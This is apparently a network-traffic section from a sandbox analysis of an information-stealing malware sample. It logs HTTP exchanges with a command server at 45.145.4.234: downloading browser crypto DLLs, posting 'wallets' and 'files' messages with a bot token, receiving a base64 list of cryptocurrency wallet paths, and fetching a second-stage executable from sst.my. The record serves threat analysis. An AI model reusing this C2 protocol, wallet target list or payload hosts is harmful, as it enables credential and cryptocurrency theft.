                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                Oct 6, 2024 22:18:47.594120026 CEST88OUTGET /bc17a177456805bc/nss3.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:47.769934893 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:47 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 2046288
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                Oct 6, 2024 22:18:49.218972921 CEST92OUTGET /bc17a177456805bc/softokn3.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:49.399677038 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 257872
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                Oct 6, 2024 22:18:49.682840109 CEST96OUTGET /bc17a177456805bc/vcruntime140.dll HTTP/1.1
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:49.858464003 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:49 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 80880
                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                Oct 6, 2024 22:18:50.348567009 CEST199OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCA
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 947
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:50.751319885 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=84
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:50.829925060 CEST466OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 267
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"wallets------KJEBKJDAFHJDGDHJKKEG--
                                                                                                                                                Oct 6, 2024 22:18:51.020071030 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:50 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Length: 2408
                                                                                                                                                Keep-Alive: timeout=5, max=83
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                Oct 6, 2024 22:18:51.022979021 CEST464OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 265
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="message"files------AAEHJEGIIDAECAAKEBKF--
                                                                                                                                                Oct 6, 2024 22:18:51.203135967 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:51 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=82
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:51.296936989 CEST202OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 113523
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Oct 6, 2024 22:18:51.707437038 CEST202INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:51 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Oct 6, 2024 22:18:51.750972033 CEST471OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"ybncbhylepme------BGDHDAFIDGDBGCAAFIDH--
                                                                                                                                                Oct 6, 2024 22:18:51.930809975 CEST259INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:51 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 56
                                                                                                                                                Keep-Alive: timeout=5, max=80
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 7a 63 33 51 75 62 58 6b 76 5a 6d 39 73 5a 47 56 79 4c 32 77 7a 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4d 48 77 3d
                                                                                                                                                Data Ascii: aHR0cHM6Ly9zc3QubXkvZm9sZGVyL2wzLmV4ZXwwfDB8U3RhcnR8MHw=


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.66388745.145.4.234806312C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Oct 6, 2024 22:18:58.278525114 CEST471OUTPOST /ce4b71a59f4ee761.php HTTP/1.1
                                                                                                                                                Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                                                                                                                                                Host: 45.145.4.234
                                                                                                                                                Content-Length: 272
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a
                                                                                                                                                Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIJEBFCFIJJJEBGDBAKE--
                                                                                                                                                Oct 6, 2024 22:18:58.997692108 CEST203INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:58 GMT
                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.663886103.6.198.2194436312C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-06 20:18:53 UTC70OUTGET /folder/l3.exe HTTP/1.1
                                                                                                                                                Host: sst.my
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                2024-10-06 20:18:54 UTC250INHTTP/1.1 200 OK
                                                                                                                                                Date: Sun, 06 Oct 2024 20:18:53 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                Last-Modified: Tue, 24 Sep 2024 05:23:37 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 4563640
                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                2024-10-06 20:18:54 UTC7942INData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!Win32 .EXE.$@PELMa^w0@}mFww|E
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: 23 00 5b 1e d1 3f 69 1c 88 64 5d 26 5c e7 a6 31 84 49 8d 1c 72 55 2c 80 f6 a9 d3 69 8e f6 f2 e9 37 10 86 82 17 21 99 e7 56 50 85 01 7b 7f f7 5e 41 56 01 58 37 bd 7b 0e e7 64 4a 26 8f a6 1c 95 8d 63 8a a6 1a bf fc fd 1e d1 e2 00 b3 ca 9c 1c f4 1e f5 e1 84 be fa 84 90 32 96 21 77 c5 b1 58 c9 01 e1 0a 0f c0 0a 53 83 25 dd f1 90 a1 05 78 ad 71 17 8c 3f a4 89 2b ab d4 ad f2 ba a9 2f de d6 c6 3c 19 d5 0d 32 91 0c 52 85 de 58 77 80 2b 70 6f 40 c2 0e 13 dc 4b 9b 97 7d bf b5 8d de f2 dd 9d 7c 2d 06 cf 99 3d 55 71 46 40 18 71 68 03 88 dd 47 5a 23 eb 04 43 1b cb f2 57 1a 4f 67 a5 28 dd 8d a5 77 5f d3 02 a1 4e b1 4e 29 63 be df 64 31 24 58 77 a2 fe 5c 72 eb 09 09 1f 51 71 16 95 1c 69 d0 ea d4 8c 3b a0 6b bb 4d b4 07 cb b5 0c 88 30 38 96 07 79 03 0d d1 11 71 08 1c 83
                                                                                                                                                Data Ascii: #[?id]&\1IrU,i7!VP{^AVX7{dJ&c2!wXS%xq?+/<2RXw+po@K}|-=UqF@qhGZ#CWOg(w_NN)cd1$Xw\rQqi;kM08yq
                                                                                                                                                2024-10-06 20:18:54 UTC8000INData Raw: ad d2 1b 80 6b 5b 73 d3 9f b0 1c 0d 72 74 31 74 6e 38 41 7c bd d5 e7 31 47 91 ac 8b 4e c7 de e1 85 32 9d 86 5b 9c 8e 75 4d bd c7 6a ba 5c c7 10 a7 c3 ec c2 8d e7 cc 61 5d a6 46 c1 1b 37 cc 81 7e d3 a1 a3 08 75 33 84 e5 22 2b d2 f5 9e 88 11 90 01 cb 58 1c 53 c8 be 57 fc 68 a0 a2 b8 c4 d4 8a 9e 93 6d 02 71 ae bc 66 81 93 64 12 34 c2 79 7f c2 cb 7f 1b 6e 4f 9f 24 d9 a0 f9 3e 96 95 88 9f 07 21 a7 66 73 fe 66 e8 67 78 e2 61 17 47 4f 25 05 40 2b 51 3f e5 da 86 51 d5 a7 c9 17 b7 e1 50 21 08 78 75 9d 83 7f c6 e4 fb 86 97 a3 43 8a 64 e7 fc df 63 c9 4d 0d 35 2e 7f 65 e0 df 61 9f 71 c0 62 42 6d 9b e1 6b 5f d4 3f 67 cc 4c fa 7b aa 78 db 83 6b 6f 0a c4 67 92 4c fe 27 8b 15 35 3e e9 24 fb 64 c7 50 e9 a6 bd c9 82 68 69 ab c6 a1 19 11 e2 42 f8 7b 32 45 c9 98 2d 41 f8 fe
                                                                                                                                                Data Ascii: k[srt1tn8A|1GN2[uMj\a]F7~u3"+XSWhmqfd4ynO$>!fsfgxaGO%@+Q?QP!xuCdcM5.eaqbBmk_?gL{xkogL'5>$dPhiB{2E-A
